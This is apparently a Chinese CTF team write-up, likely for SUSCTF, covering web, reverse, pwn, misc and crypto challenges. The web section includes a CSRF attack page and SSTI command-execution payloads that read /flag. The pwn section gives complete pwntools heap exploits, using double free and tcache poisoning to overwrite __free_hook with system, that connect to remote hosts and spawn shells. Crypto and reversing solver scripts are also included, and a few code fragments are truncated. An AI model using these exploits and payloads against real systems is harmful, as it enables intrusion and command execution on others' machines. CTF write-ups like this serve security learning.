0x00 Web
rubbish maker
直接通过index.txt中的解混淆函数去替换index.txt中的对应调用。然乎通过goto去把代码重新排序。结合本地去给index.php加一些echo和var_dump来运行调试。可以大概分析到程序逻辑,
最终payload:
function lMxvOnYC($FpuomFef){
//将index.txt中第一个函数复制到这里
}
$GLOBALS['code'] ='···';//index.txt中除了第一个函数之外的base64
$GLOBALS['transcode'] ='···';//index.txt中第一个函数的base64
$GLOBALS['key'] ="iZnlAZzX";
$transfrom ="lMxvOnYC";
$array=[];
$bb = preg_match_all("/".$transfrom."\('[\w\W]+[^\\\\]{1}'\)/U",base64_decode($GLOBALS['code']),$array);
$map =[];
$func =[];
$funccode=[];
//var_dump($array);
//var_dump($array[0][0]);
//eval('var_dump('.$array[0][0].');');
function find_in_tranfcode($str){
$array=[];
preg_match_all("/".$str."' === \(\\$........ \^ \\$........\)\) {\n goto ........;/U",base64_decode($GLOBALS['transcode']),$array);
if($array[0][0]!==null) {
$goto = substr($array[0][0], 54, -1);
preg_match_all("/".$goto.":\n return ([^}])+};/",base64_decode($GLOBALS['transcode']),$array);
return substr($array[0][0],21,-1);
}else{
preg_match_all("/".$str."' !== \(\\$........ \^ \\$........\)\) {\n goto ........;
}
goto ........;/U",base64_decode($GLOBALS['transcode']),$array);
if($array[0][0]!==null){
$goto = substr($array[0][0], 79, -1);
preg_match_all("/".$goto.":\n return ([^}])+};/",base64_decode($GLOBALS['transcode']),$array);
return substr($array[0][0],21,-1);
}else{
echo "
not found
";
}
}
}
for ($i=0;$i<295;$i++){
// if(sizeof($array[0][$i])!==20||sizeof($array[0][$i])!==21){
// continue;
// echo $i;
// }
try {
eval('$map[$array[0]['.$i.']]='.$array[0][$i].';');
}catch (Exception $e){
echo $e;
}
}
// var_dump(base64_encode($array[0][0]));
$code=$GLOBALS['code'];
$num=0;
$expc=[];
//echo sizeof($array);
for ($i=0;$i<295;$i++){
if(is_string($map[$array[0][$i]])){
$code = base64_encode(str_replace($array[0][$i],$map[$array[0][$i]], base64_decode($code)));
}else if($map[$array[0][$i]]!==null){
$code = base64_encode(str_replace($array[0][$i],"function_".$i, base64_decode($code),$num));
// var_dump(substr($array[0][$i],9,-1));
if($num!==0){
eval('$func["function_".$i]='.substr($array[0][$i],9,-1).'^"'.$GLOBALS['key'].'";');
}
// $func["function_".$i]=substr($array[0][$i],9,-1)^"MCKePhvU";
}else{
$code = base64_encode(str_replace($array[0][$i],"null_".$i, base64_decode($code),$num));
}
}
//var_dump($code);
var_dump($func);
foreach ($func as $key=>$str) {
$funccode[$key]=find_in_tranfcode($func[$key]);
}
//var_dump($funccode);
//replace Func
foreach ($funccode as $key=>$value){
if(strstr($value,' == ')!==false){
$code = base64_encode(str_replace($key,"func_if_equal", base64_decode($code),$num));
}elseif (strstr($value,' !== ')!==false){
$code = base64_encode(str_replace($key,"func_if_not_equal", base64_decode($code),$num));
}elseif (strstr($value,' + ')!==false){
$code = base64_encode(str_replace($key,"func_add", base64_decode($code),$num));
}elseif (strstr($value,' % ')!==false){
$code = base64_encode(str_replace($key,"func_percent", base64_decode($code),$num));
}elseif (strstr($value,' > ')!==false){
$code = base64_encode(str_replace($key,"func_dayv", base64_decode($code),$num));
}elseif (strstr($value,' - ')!==false){
$code = base64_encode(str_replace($key,"func_minus", base64_decode($code),$num));
}elseif (strstr($value,' ?? ')!==false){
$code = base64_encode(str_replace($key,"func_double_wenhao", base64_decode($code),$num));
}elseif (strstr($value,' * ')!==false){
$code = base64_encode(str_replace($key,"func_cheng", base64_decode($code),$num));
}elseif ($value===NULL){
echo $key;
echo base64_encode($array[0][13]);
$code = base64_encode(str_replace($key,"NULL_func", base64_decode($code),$num));
}
}
var_dump($code);
//release goto
$goto_name=[];
$goto_block=[];
preg_match_all("/[a-zA-Z]{8}:/",base64_decode($code),$goto_name);
//var_dump($goto_block);
function get_goto_block($name,$code){
$end='';
$part_code=strstr(base64_decode($code),$name);
// var_dump($part_code);
preg_match("/[a-zA-Z]{8}:/",substr($part_code,8),$end);
// var_dump($end);
if(sizeof($end)===0){
return $part_code;
}
$part_code=explode($end[0],$part_code);
// var_dump($part_code[0]);
return $part_code[0];
}
foreach ($goto_name[0] as $value){
// var_dump($value);
$goto_block[$value]=get_goto_block($value,$code);
}
$bad_key=null;
foreach ($goto_block as $key=>$value){
if($bad_key!==null){
$goto_block[$bad_key].=$value;
$bad_key=null;
}
if(strlen($value)==10){
$bad_key=$key;
}
}
var_dump($goto_block);
// renew code without goto
function get_next_goto($code){
$match=[];
preg_match_all("/goto [a-zA-Z]{8};/",$code,$match);
foreach ($match[0] as $value){
if(strstr($code,substr($value,5,-1).':')===false){
return substr($value,5,-1);
}else{
}
}
echo "has a xunhuan";
return false;
}
$no_goto_code='';
$xunhuan_list=[];
$first_goto="goto GAjzJxOm;";
$no_goto_code=$first_goto;
$next_goto='GAjzJxOm';
//var_dump(get_next_goto($first_goto));
while ($next_goto){
$no_goto_code=str_replace('goto '.$next_goto.';','goto '.$next_goto.';
'.$goto_block[$next_goto.':'],$no_goto_code);
$next_goto = get_next_goto($no_goto_code);
echo $next_goto.'
';
}
$code=base64_encode($no_goto_code);
var_dump($code);
//var_dump($goto_block);
//var_dump(get_goto_block("raxZOkQy:",$code));
fxxkcors
CSRF 创建一个恶意html 让bot访问给我们权限即可。
<!DOCTYPE html>
<html>
<head>
<title>Evil page</title>
</head>
<body>
<script>
function go(){
let w = window.open("http://124.71.205.122:10002/change.php",'');
setTimeout(function(){w.close();csrf.submit()},1000)
}
</script>
<img onerror=go() src='xxx'>
<form style="display:none" name="csrf"
method="post" action="http://124.71.205.122:10002/changeapi.php" enctype="text/plain">
<input type="hidden" name='{"username":"' value='Retr_0"}' />
</form>
</body>
</html>
注册一个=Retr_0的用户名就有flag
gadget2/revenge
xxe 用ftp 读hint.txt
之后有源码zip
能看出来post他那个接口 之后有反序列化
打CC6 第一个不出网弹不了shell,用revenge的弹shell 之后得到flag路径
revenge直接 cat
v2.0就
curl -d -F 读flag
HTML practice
判断为python写的
测试发现$,<,/,,%,>都被ban了, 发现%while可以用
eval和exec也被ban了
搜索得到一个叫unicode欺骗的东西(HCTF2018)
https://unicode-table.com/en/1D49/
将eval变成ₑval
经过搜索与幸运的尝试self.context.writer()可以使用
故SSTI
%while self.context.writer()(ₑval(name))==0:
%endwhile
再利用python的str函数达到命令执行
?name=str(__import__(%27os%27).popen(%27ls/%27).read())
?name=str(__import__(%27os%27).popen(%27cat%20/flag%27).read())
0x01 Re
DigitalCircuits
使用pyinstxtractor和Uncompale反编译python封装程序
发现TEA加密
直接脚本解密
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
|
得到flag
hell_world
在case3读入并且得知flag未=为44位
在case8进行校验
对a1+376 == 44 进行校验
向下找到对a1+376进行操作的位置
实际调试发现是将输入转化为2和3的编码进行比较,找到生成正确23编码的源头
向上找到异或数组
发现能够直接进行异或,得出结果
```cpp=
include <stdio.h>
int main()
{
unsigned char enc[44] = {5, 143, 158, 121, 42, 192, 104, 129, 45, 252, 207, 164, 181, 85, 95, 228, 157, 35, 214, 29, 241, 231, 151, 145, 6, 36, 66, 113, 60, 88, 92, 48, 25, 198, 245, 188, 75, 66, 93, 218, 88, 155, 36, 64};
unsigned char xor_byte[44] = {86, 218, 205, 58, 126, 134, 19, 181, 29, 157, 252, 151, 140, 49, 107, 201, 251, 26, 226, 45, 220, 211, 241, 244, 54, 9, 32, 66, 4, 106, 113, 83, 120, 164, 151, 143, 122, 114, 57, 232, 61, 250, 64, 61};
for (int i = 0; i < 44; i++)
{
printf("%c", xor_byte[i] ^ enc[i]);
}
return 0;
}
## 0x02 Pwn
### rain
`realloc`对应size为0时相当于free,free时指针未置0
`rain`可以将+0x48处指针置0,再次`realloc`相当于`malloc`
多次`free`拿到`heap`和`libc`基址,清掉指针
再次申请,利用原地double free,再申请,修改tcache fd指向`__free_hook-0x10`
两次清掉指针再申请即可拿到`__free_hook-0x10`指针,写入`/bin/sh\x00+p64(0)+p64(libc.sym['system'])`
最后free,即可getshell
```python
from pwn import*
context(os='linux', arch='amd64', log_level='debug')
# r = process('./rain')
# r = process(["./rain"], env={"LD_PRELOAD":"./2.27-3ubuntu1.2_amd64/libc.so.6"})
r = remote('124.71.185.75', 9999)
libc = ELF('./libc.so.6')
elf = ELF('./rain')
def config(frame):
r.sendlineafter("ch> ", str(1), timeout = 600)
r.sendafter("FRAME> ", frame, timeout = 600)
def show():
r.sendlineafter("ch> ", str(2), timeout = 600)
def free():
f = ''
f+= p8(0x50)+p8(0)+p8(0)+p8(0) #0 1 2 3
f+= p8(0x50)+p8(0)+p8(0)+p8(0) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p8(0x64)+p8(0)+p8(0)+p8(0) #10 11 12 13
config(f.ljust(0x12, "\x00"))
f = ''
f+= p32(1) #0 1 2 3
f+= p32(1) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0x64) #10 11 12 13
f = f.ljust(0x12, "\x00")
config(f.ljust((0x1d8+0x12), "\x00"))
config(f.ljust((0x1e8+0x12), "\x00"))
free()
free()
show()
r.recvuntil("Table: ")
heap_base = u64(r.recv(3)+"\x00"*5)-0x9160
f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
for i in range(4):
config(f.ljust((0x18+0x12), "\x00"))
config(f.ljust((0x38+0x12), "\x00"))
f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
for i in range(7):
config(f.ljust((0xb8+0x12), "\x00"))
config(f.ljust((0xe8+0x12), "\x00"))
config(f.ljust((0xb8+0x12), "\x00"))
free()
show()
libc.address = u64(r.recvuntil("\x7f")[-6:]+"\x00"*2)-96-0x10-libc.sym['__malloc_hook']
print hex(heap_base)
print hex(libc.address)
r.recv()
r.sendline('3')
f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
config(f.ljust((0x68+0x12), "\x00"))
free()
free()
f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
f+= p64(libc.sym['__free_hook']-0x10)
config(f.ljust((0x68+0x12), "\x00"))
r.recv()
r.sendline('3')
f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
config(f.ljust((0x68+0x12), "\x00"))
r.recv()
r.sendline('3')
f = ''
f+= p32(0x50)*2
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
f+= "/bin/sh\x00"+p64(0)+p64(libc.sym['system'])
config(f.ljust((0x68+0x12), "\x00"))
free()
r.sendline("cat flag")
r.interactive()
Happytree
问题应该是在申请的时候左右孩子没有置0
所以可以控制节点,在堆上伪造chunk造成重叠,然后修改tcache的fd,改写__free_hook
为system
from pwn import*
context(os='linux', arch='amd64', log_level='debug')
r = remote('124.71.147.225',9999)
# r = process('./happytree')
# r = process(["/lib64/ld-linux-x86-64.so.2", "./happytree"], env={"LD_PRELOAD":"./libc.so.6"})
elf = ELF('./happytree')
libc = ELF('./libc.so.6')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def insert(sz, ct):
r.sendlineafter('cmd> ', str(1))
r.sendlineafter('data: ', str(sz))
r.sendafter('content: ', ct)
def delete(sz):
r.sendlineafter('cmd> ', str(2))
r.sendlineafter('data: ', str(sz))
def show(sz):
r.sendlineafter('cmd> ', str(3))
r.sendlineafter('data: ', str(sz))
insert(0xc9, '0'*0xc9) #0
insert(0xcb, '1'*0xc9) #0
delete(0xcb)
delete(0xc9)
insert(0xc9, '0') #0
show(0xc9)
r.recvuntil('content: ')
heap_base = u64(r.recv(6)+'\x00\x00')-0x11f30
delete(0xc9)
insert(0xc9, 'A'*0x60+p64(0)+p64(heap_base+0x127f0)+p64(0)) #0
insert(0xcb, 'B'*0xc9) #1
insert(0xcd, 'C'*0xc9) #2
insert(0xcf, 'D'*0xc9) #3
insert(0xd0, 'E'*0xc9) #4
insert(0xd2, 'F'*0xc9) #5
insert(0xd4, 'G'*0xc9) #6
insert(0xd6, 'H'*0xc9) #7
delete(0xd6)
delete(0xd4)
delete(0xd2)
delete(0xd0)
delete(0xcf)
delete(0xcd)
delete(0xcb)
delete(0xc9)
insert(0x40, '\xa0')
show(0x40)
libc.address = u64(r.recvuntil('\x7f')[-6:]+'\x00\x00')-352-0x10-libc.sym['__malloc_hook']
delete(0x40)
insert(0xc9, 'a'*0xc9) #0
insert(0xcb, 'b'*0xc9) #1
insert(0xcd, 'c'*0xc9) #2
insert(0xcf, 'd'*0xc9) #3
insert(0xd0, 'e'*(0xa0-0x20)+p64(0) \
+p64(0x31)+p64(0xd0)+p64(heap_base+0x124b0)+p64(0)*3+p64(0x51)) #4
insert(0xd2, 'f'*0xc9) #5
insert(0xd4, 'g'*0xc9) #6
insert(0xd6, '/bin/sh\x00'.ljust(0xa0, 'A')+p64(0)+p64(0xa1)) #7
insert(0xd8, p64(0)*3+p64(0x61)\
+p64(0xe0)+p64(heap_base+0x127a0)\
+p64(0)*9+p64(0x21)+p64(0)*3+p64(0x21)) #7
delete(0xc9)
delete(0xcb)
delete(0xcd)
delete(0xcf)
delete(0xd0)
delete(0xd2)
delete(0xd4)
delete(0xd6)
delete(0xe0)
delete(0xd8)
one = [0x4f365, 0x4f3c2, 0x10a45c]
insert(0x90, '/bin/sh\x00'.ljust(0x20,'A')+p64(0)+p64(0xe1)+p64(0)*3+\
p64(0x41)+p64(libc.sym['__free_hook']))
insert(0x58, '/bin/sh\x00')
insert(0x57, p64(libc.sym['system']))
insert(0x56, '/bin/sh\x00')
log.success("libc_base ==> "+hex(libc.sym['__malloc_hook']))
log.success("heap_base ==> "+hex(heap_base))
delete(0x56)
r.interactive()
kqueue
删除umount 重写 重新启动的时候利用 root执行 /bin/sh即可
kqueue revenge
这里直接flag再附件里
0x03 Misc
Tanner
就是一个计算公式。。。 把c0-c9的方程写出来
f0-f4只能是0.吧所有满足的数字加和后二进制再哈希
AUDIO
利用AU处理 将莫斯声放大到能听清为止。直接手动解决下就可以了
misound
利用AU查看频谱得到一些字母。silenteye得到一些字母。 SSTV也有一串。
然后想怎么计算flag
发现 S也就是flag第一位 * 频谱图字母第一位 和 silenteye得到的第一位*26比较相同
比较了下下一位 发现也很相同。得到结果错了几个字母。手动改一下就可以了。
ra2
通过里面的内容可以知道就是需要找到flag这个建筑的位置。可以看到地图信息里有坐标。利用arcmap查看shp的素材就可以看地图了。然后就能找到flag位置。一个动图。
checkin
discord >help >flag 再 私聊>flag瞬间截图。
0x04 Crypto
large case
$e$可以直接枚举
把$c$乘$2^{-(1024 + 8\times k)}$就能换到两个素数乘积上,$p-1, q-1$的因子比较小,就换到$p, q$然后在$p$和$q$上跑AMM,最后CRT一下就出了
import random
import time
from Crypto.Util.number import *
from tqdm import tqdm
# About 3 seconds to run
def AMM(o, r, q):
if r == 3:
return(AMM3(o, r, q))
start = time.time()
print('\n----------------------------------------------------------------------------------')
print('Start to run Adleman-Manders-Miller Root Extraction Method')
print('Try to find one {:#x}th root of {} modulo {}'.format(r, o, q))
g = GF(q)
o = g(o)
p = g(random.randint(1, q))
while p ^ ((q-1) // r) == 1:
p = g(random.randint(1, q))
print('[+] Find p:{}'.format(p))
t = 0
s = q - 1
while s % r == 0:
t += 1
s = s // r
print('[+] Find s:{}, t:{}'.format(s, t))
k = 1
while (k * s + 1) % r != 0:
k += 1
alp = (k * s + 1) // r
print('[+] Find alp:{}'.format(alp))
a = p ^ (r**(t-1) * s)
b = o ^ (r*alp - 1)
c = p ^ s
h = 1
for i in range(1, t):
d = b ^ (r^(t-1-i))
if d == 1:
j = 0
else:
print('[+] Calculating DLP...')
j = - discrete_log(d, a)
print('[+] Finish DLP...')
b = b * (c^r)^j
h = h * c^j
c = c^r
result = o^alp * h
assert result^r == o
end = time.time()
print("Finished in {} seconds.".format(end - start))
print('Find one solution: {}'.format(result))
return result
def AMM3(o, r, q):
start = time.time()
print('\n----------------------------------------------------------------------------------')
print('Start to run Adleman-Manders-Miller Root Extraction Method')
print('Try to find one {:#x}th root of {} modulo {}'.format(r, o, q))
g = GF(q)
o = g(o)
p = g(random.randint(1, q))
while p ^ ((q-1) // 3) == 1:
p = g(random.randint(1, q))
print('[+] Find p:{}'.format(p))
t = 0
s = q - 1
while s % r == 0:
t += 1
s = s // 3
print('[+] Find s:{}, t:{}'.format(s, t))
a = p ^ s
apie = p ^ (pow(3, t - 1, q) * s)
b = o ^ s
h = 1
for i in range(1, t):
d = b ^ (3^(t-1-i))
if d == 1:
j = 0
elif d == apie:
j = 2
else:
j = 1
b = b * (a^3)^j
h = h * a^j
a = a^3
l = (s + 1) // 3
result = o^l * h
if s % 3 == 1:
result = result^(-1)
end = time.time()
print("Finished in {} seconds.".format(end - start))
print('Find one solution: {}'.format(result))
return result
def findAllPRoot(p, e):
print("Start to find all the Primitive {:#x}th root of 1 modulo {}.".format(e, p))
start = time.time()
proot = set()
while len(proot) < e:
assert pow(pow(random.randint(2, p-1), (p-1)//e, p), e, p) == 1
proot.add(pow(random.randint(2, p-1), (p-1)//e, p))
end = time.time()
print("Finished in {} seconds.".format(end - start))
return proot
def findAllSolutions(mp, proot, e, cp, p):
print("Start to find all the {:#x}th root of {} modulo {}.".format(e, cp, p))
start = time.time()
all_mp = set()
for root in proot:
mp2 = (mp * root) % p
assert(pow(mp2, e, p) == cp)
all_mp.add(mp2)
end = time.time()
print("Finished in {} seconds.".format(end - start))
return all_mp
p = 127846753573603084140032502367311687577517286192893830888210505400863747960458410091624928485398237221748639465569360357083610343901195273740653100259873512668015324620239720302434418836556626441491996755736644886234427063508445212117628827393696641594389475794455769831224080974098671804484986257952189021223
q = 145855456487495382044171198958191111759614682359121667762539436558951453420409098978730659224765186993202647878416602503196995715156477020462357271957894750950465766809623184979464111968346235929375202282811814079958258215558862385475337911665725569669510022344713444067774094112542265293776098223712339100693
es = [108281733, 210254331, 243755169, 11709895983, 22737504081, 26360380419, 26436211671, 51332093097, 59511083403, 2402158058783, 4664352163681, 5407545920819, 259776235785533, 504416369700931, 584787466008569, 586469731780021, 1138768263961547, 1315090665606477, 1320213711239953, 2553556361177139, 2960426828828361, 1446314880565794729, 2951342803295903933, 3046542174379651381, 5244373062415575681, 5730722897265089731, 5915574760310485067, 6643826653516219769, 6858131856658956433, 10183177893473575167, 11805712807793316333, 29174409689369287927, 56648945501807377289, 65675095579671303211, 156408623512615229979, 203513631527229102723, 319166643156428468183, 329461775143628013631, 353107447269563313123, 619736747604238989481, 639727156222148170817, 718482396673111195019, 720549264404671403071, 741657973641547145683, 743791510859260601447, 1399115061632291192897, 1444245323624374139929, 1622042821551317083603, 1674363906147165220571, 22008545580873204394473, 32085531415431778866379, 49686399468576362364801, 116342920140981269432531, 225907012781448949363117, 261901868165689527303383, 3469821040211693800264129, 4514814239677226157841273, 7833453312710415726091673, 17565614681839486963466001, 35844304150722227767998277, 37000508441281960784638589, 69600106874634387004039739, 71845148146840164140542723, 80689828042802917659665761, 83292582583533373331870777, 488244911347951457355120523, 1102259647944054214821533651, 1372907974903398422730619063, 2471690004676366077508961787, 2665822200942044629057437641, 3090580527040748795616666859, 39420970608751091035136363329, 40692544891912304963691843353, 70048886264223851005605479253, 142941401718783995602556501081, 147552161109479279411611772017, 148470191000267515143868375813, 277554190886335178334488412967, 286507059521090077594625371919, 288289629444732540599497184891, 321778240592613006319324578533, 332157613025609308035138743581, 334224208424263834040259544609, 335185675587129700635232568381, 389681451306821125293184254851, 650841448772850610151308704067, 754543160101805670244126237433, 4263096392974939416228318148579, 4400608069025373551073532202603, 5546997403343202817428989990923, 5725922963468489390241246025811, 9624348395765087797006863561323, 9856707843933099425344839579111, 9934794174325447026135622898611, 54832794960408730518817977936737, 599868147761543504684820774732673, 619217669049378066916089034505561, 1354259794616219087855163413498201, 1397943192081092623988898494015857, 1553987842514296651992020486908303, 2306482138968943482837259107578493, 4478574969726096291428563445115651, 5192167949323976043220925299233849, 16674081698823112227103433084551247, 32376632655347296193048114505108529, 37535357902116646230842682504951971, 218664492379093188684991702836191461, 478770971246976986605455916130679401, 494214346819942370194579413571424257, 18337878225039451455456773066205502019, 51167768598266698537756035128890481543, 66493594083490535814037606927859972491, 67368745449244076658709735025640507587, 69541811278908761091524863075822173259, 99354199986726962161148394320927307001, 115184784510452859201494080479970117499, 129112877606141201604263365949805806837, 149685055957117306824515723709889999663, 1909262722594312006386077682702695869453, 1970848455780453992853937042891277654021, 1983110545193552107397253887302509289769, 2580356630654263050806094629170605249953, 4477061983798917505339375024306457564353, 268655875311694898897921059259721830466511, 277321717293543040901561410542520091313527, 279047138486468161351459090611735453459203, 629975640255447936261087960178937767452811, 30807591889483392862467635081113066058436609, 62865815619856530416821659372816382999784693, 64893633636453475730736119260056515334038701, 122068696535566946631432183836043593737639051, 126006179882544203022597162279988607623684307, 141518491496076889788104924616244287890010449, 146083353081149906765742115012503825043137193, 222715058326390594783693727646022621707566011, 4334993014512067266241653593507830147669982283, 31338646186141120671376964978872544541087859657, 683445887673596081725269505851105961795710546259, 888152340388328004795786144873791103598988591783, 96168930031607204256726923869575539939293443626833, 124973552143172976767156385477660225012812703210221, 29243969733682697637869290859066007973156798737283423, 56784012610323698440673165205227540930073114701712161, 65831683582906000914251435126752080663985890766132339, 839696245071216864612080607384272932227087588894197209, 866781731156700717324546343024028321894549844065366513, 118155205695850894493864777469528359480677868695184974483, 121966454345094320231418382700928840976382500350900792731, 390610562103222033974506216542750990075147280485271838771762699, 54963531852359074460934241162612075634897419649515466832101325113, 25406976670004014948758933236867995672593596052426680353315343084713278344953610243021354093888376700328578783688724808149304956414842621035895628049848011954681403740536563587458414968130181375745372588025244451571689351394571703822008628735138994568974677316701, 49333592421210158599560913824599990152097598704734552080332525637651797327948274966020374126489200461942854316390249745823106301096851615370699342810163819646399091724985716271460385930880858787751420083394734578884763906736601552347029459816034025749406911830307, 57194151962601908989702446962245010576846980035653828422115862921285776609413958695579809733601171027843219658738372417856725721996318596036948299318887356358873439067804005389719540423579127379180990723172678050499703892480961782794441045903763489448866731991193, 563636839439592402294917761237758571999373866025717619184732009438974271230565874167933393003517711512322634596945234052253564254759006985933987244533844913206637154381309972145373297124655987033327260616948031328483547134454310201488713422736568501849657233152800551, 1094432858802933228425525832589534381530850495532066214867456859587546689188980514604517986413411919447894261106240097111255064552299588519255384454014944229642266250524324791671501021619304598300406753603389923476172564095013681037783950546378837505233426067680807257, 1268814131855681616330555650892764062973632354104289747659025675000110763562109064355641025733452911805349932649338299841872888992006997174015673388189970075917367996759853323567334857936820554822210825199770414098302264385428483176772811642677723837763475871403289243, 339359995540658644241007176531370773813996369855682253530444155697061052726645525409967321161747267763946288479827215381968412837490801195576631132437590628266192916438762724746229895112398217680004835842585943119245658224691282019924832755152420242888122619498790513180513, 692496284193413120035837647146969979719644074911195955170620181274935754583144695321819963426066992659185281575341988746826363141539526706609807192914375556251598502558054842278733521690237628847393257672632518264265736699066297007588579704693080134102249220397295403910101, 714833645566488172760610920553050750738073438553481401449793484799878434770731733593716836239749671906199550723087258912836582381331979286400924232437402608535829471881146367534938425104208158602331499643108272064467053850643929878003796818555330812811705820209152794454157, 1344643633964298947448114268040946775048727124902659158256219791652765145048604567412012939547173515432551420124298859717857538865650141541000994963621426089130220245329335553990677560824177997634513020639131875886198401311921490968175017563215589871701247110903783737544107, 1388016849756856835521783459562619261048226731390897112653052562750885314922391748451395391012306044955038550129071889506443740985502533412243076330084360441805597211308519979257614926577494762405355153465159894545467879415155956136300477528793148023696771053681618679622899, 1558892198238436429172710892398370048662671607775498292447267593338966973520427122824343184205361571013658118241514223823687402206809326302061373263819662142307764870286898625744390650688690389447826982354014283871885217333845288284118508967596887659884760266979297314377393, 1609176277977980138974723571173860499736700425260232716710871776521098891601551943907283278849679158655414423725839398950562025154732230375931983726506984837088744742140113150315160076130939854012958201264928928893040025562721755535968055444297488276511281153796879615502601, 47751970207570499258915820242397118449576211540995456813906015972285194426260840013058403726061060940250185201333192652765028525530799682410570568255153384573449129991349803917556772151572939382024706555318643846472498952166014972993897704668080932007361602303354774596410731, 7528475261072484916723916873230773036547633467668407006403883298035501414038813217536518375092588637164639112399313555105381259857841763989737177252372989694333312389249658540011946069805146193752453946610540757471718763942626297424019131451219674808311074898501001674567560563, 1059345624408146479059541528197418474724881868895956879111962360334498848216979228463025314393513929585490191901442656873156981153217103754490234343028407734505586649438101166708385285667877944897296765125373901304761407587834931499220957979591596755961978906031723437904974460081, 322135968108610723705369622882782332242423434514438800877723780862064525976202163758190895343110387166987598956324574054166387521285150907144132986499344962564195479732198806113192323453070262175854574294664102480269928111914354141056442557387879498054818851493964797426979167923711, 625502387052793872924977393619491578364842655801931429366650664410256346635664834268314420777294817704348737232145347513220088294805529795276113669620080859272495806326977784316842825575768147982808031633686521591823751422491969714087434887503303178312926880723749766921074548213377, 725166703300666764467231777988433880957243944827032486154492083529467562347141677212014115332095630659554492025936823226003807533911126603057058973027542417880716247043794494180467428728775566655824943960020515171395672920542694926937150092664981318686389516967716906385900493823123, 9249645834218897668951948544899752024077200137667808695857469528381986157572981583087476653532809318384957202955513144244161989845728044707689556952303767638925799018095048523239149176063031875430417602781773270278132634337681410660544247231485471593774730143806191302608153528454713, 9548005098070484172811082359340981067013403602893579823556712483840133166674858565653348687173582744709681725394281880632064521967038379516010703693758007850849952657154704992179398286327267173194155495115111917784535834537493231910935197315260888369949161551480259568671560470997841, 1301534706831055288853171354033715248441226841360388497860847655297254941901979463162771941407018751406528741498296226435565392533151484221986710135161079857695712615720020116296172021844529182084010330345731546990446814351388984216018061449350309883869485311246710650960384772067006131, 1343517388543127228165971342394128397727816580628520017335217664331339607794045132379185030717429005886993984511343143537493131432463437915532540258235476376960807581297110297966246961622375576106920765567794144065006100523945340535436950641313768030990237959543442077834777008289479867, 4302757550444376232875852369861221786569640597052767358213181836684862073358531306355126192042405690007729306200109743921969899400285115759669006519359646900424067089293276040916794689561218011199080834106938288709501402731009001331088923956032378426608279247865508173386408044594368467705643, 605448942300572786062865482761098881810971597872508580814707424685800287849623550042807567107366863251676423035872821179385526154657514948429210317742203085711921604672299571632645329255775976736758990264004439809129525914731135505105013976920565326282658996138123476930429586149012247721158041]
n = 3094822687440851047614939396401973115026642334105659170846367264751090139004472347624890092266410158638428735172508723023428269969359498983926136713021325176403547659700063138756228187448027776416225406803246863161310767283030558013531427777522406827071820828858816733381479204207037916294884077802760772064129013958002304165692690846718396934886835581199916757466437993883772110404556790032091447246567853674312199484073929019059539960634130860821444199182318813599404568277081546429864286845543474482186422783337170254812753566292884279364725874464841284839523101292260485948181851419372018630191413487544090390569241554687344929470966816975069378342891949688784943776757193672523333822356696251333202634214314719974036423097437650759692052618463493661241936049855010728499732858413958382035388764322369175672005417188147997974674639659256989496314567458982088172614446060434494767158607398742868339797458056998131556423873
for e in es:
try :
c = 2832775557487418816663494645849097066925967799754895979829784499040437385450603537732862576495758207240632734290947928291961063611897822688909447511260639429367768479378599532712621774918733304857247099714044615691877995534173849302353620399896455615474093581673774297730056975663792651743809514320379189748228186812362112753688073161375690508818356712739795492736743994105438575736577194329751372142329306630950863097761601196849158280502041616545429586870751042908365507050717385205371671658706357669408813112610215766159761927196639404951251535622349916877296956767883165696947955379829079278948514755758174884809479690995427980775293393456403529481055942899970158049070109142310832516606657100119207595631431023336544432679282722485978175459551109374822024850128128796213791820270973849303929674648894135672365776376696816104314090776423931007123128977218361110636927878232444348690591774581974226318856099862175526133892
c = (c * inverse(int(pow(2, 1032 * e, n)), n)) % (p * q)
cp = c % p
cq = c % q
cp = pow(cp, inverse(e // GCD(e, p - 1), p - 1), p)
cq = pow(cq, inverse(e // GCD(e, q - 1), q - 1), q)
e1 = GCD(e, p - 1)
e2 = GCD(e, q - 1)
mp = AMM(cp, e1, p)
mq = AMM(cq, e2, q)
print(mp)
p_proot = findAllPRoot(p, e1)
q_proot = findAllPRoot(q, e2)
mps = findAllSolutions(mp, p_proot, e1, cp, p)
mqs = findAllSolutions(mq, q_proot, e2, cq, q)
# print(mps, mqs)
def check(m):
h = m
# print(long_to_bytes(h))
if b'SUSCTF' in long_to_bytes(h):
print(long_to_bytes(h))
return True
else:
return False
start = time.time()
print('Start CRT...')
for mpp in tqdm(mps):
for mqq in mqs:
solution = CRT_list([int(mpp), int(mqq)], [p, q])
if check(solution):
print(solution)
print(time.time() - start)
end = time.time()
print("Finished in {} seconds.".format(end - start))
except AssertionError:
continue
InverseProblem
直接LWE,低精度看成噪声
s = open(".\\89f6f4d1e3914ec39686faa928223ee0\\b.txt", 'r').read().split('\n')
s = [int(i[:-4].replace('.', '')) for i in s[:-1]]
A = gravity(len(s))
A = [[int(i*10**18) for i in Ai] for Ai in A]
M = block_matrix([Matrix(ZZ, A), identity_matrix(85)], ncols=2, subdivide=False)
M = block_matrix([M, Matrix(ZZ, s+[0]*85)], nrows=2, subdivide=False)
ML = M.LLL()
print(''.join([chr(i) for i in ML[0][85:]]))
SpecialCurve3
1
